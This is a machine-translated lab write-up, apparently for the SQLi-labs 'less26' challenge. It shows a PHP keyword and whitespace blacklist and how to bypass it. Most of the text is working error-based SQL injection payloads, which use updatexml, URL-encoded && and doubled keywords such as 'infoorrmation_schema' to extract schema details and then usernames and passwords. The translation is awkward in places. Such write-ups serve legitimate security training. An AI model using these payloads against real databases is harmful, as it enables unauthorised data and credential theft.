SQL injection less26 (filter spaces and comments, and use error injection without spaces)

function blacklist($id)
{
    
	$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
	$id= preg_replace('/and/i',"", $id);		//Strip out AND (non case sensitive)
	$id= preg_replace('/[\/\*]/',"", $id);		//strip out /*
	$id= preg_replace('/[--]/',"", $id);		//Strip out --
	$id= preg_replace('/[#]/',"", $id);			//Strip out #
	$id= preg_replace('/[\s]/',"", $id);		//Strip out spaces
	$id= preg_replace('/[\/\\\\]/',"", $id);		//Strip out slashes
	return $id;
}

Try to bypass spaces

Replace blank space ：

（1）mysql Blank character ：%09、%0A、%0B、%0D、%20、%0C、%A0、/**/
（2） Regular whitespace ：%09、%0A、%0B、%0D、%20

25% Is a percent sign ,%25A0 It's a blank character 

%09——TAB key （ level ）
%0a—— Create a new line 
%0c—— A new page 
%0d return  function 
%0b——TAB key （ vertical ）
%a0—— Space 

Inline comments are often used to bypass spaces
I tried , Found that you can't bypass the space
because Windows You cannot use some special characters to replace spaces ,Linux Sure , You can go to Linux Next try

Injection method without spaces ( An error injection )

?id=1'||updatexml(1,concat(0x7e,(database())),1)||'1' ='1
?id=1'%26%26updatexml(1,concat('~~',database()),1)%26%26'

%26 yes & Of url code .
because and There must be a space before and after , So use &&
however && It cannot be submitted to the server normally , So we have to input his url code %26%26 Talent .

use || It's fine too , Better to use

?id=1'%26%26updatexml(1,concat('~~',database()),1)%26%26'

?id=1'%26%26updatexml(1,concat('~~',(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema="security"))),1)%26%26'
Notice that the statement is wrapped in parentheses , Around the space
Parenthesis () Separate the parts of each query

?id=1'%26%26updatexml(1,concat("~~",(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema="security"%26%26table_name="users")),0)%26%26'

near 'LIMIT 0,1'
This problem , Error injection has also occurred before , There may be more Limit 0,1 As a result, the whole statement cannot be formed
It could also be here (table_schema="security"%26%26table_name="users") There is a problem

?id=1'%26%26updatexml(1,concat("~~",(select(group_concat(username,passwoorrd))from(users))),0)%26%26'

https://blog.csdn.net/weixin_43901998/article/details/107340272
https://blog.csdn.net/weixin_43901998/article/details/107340272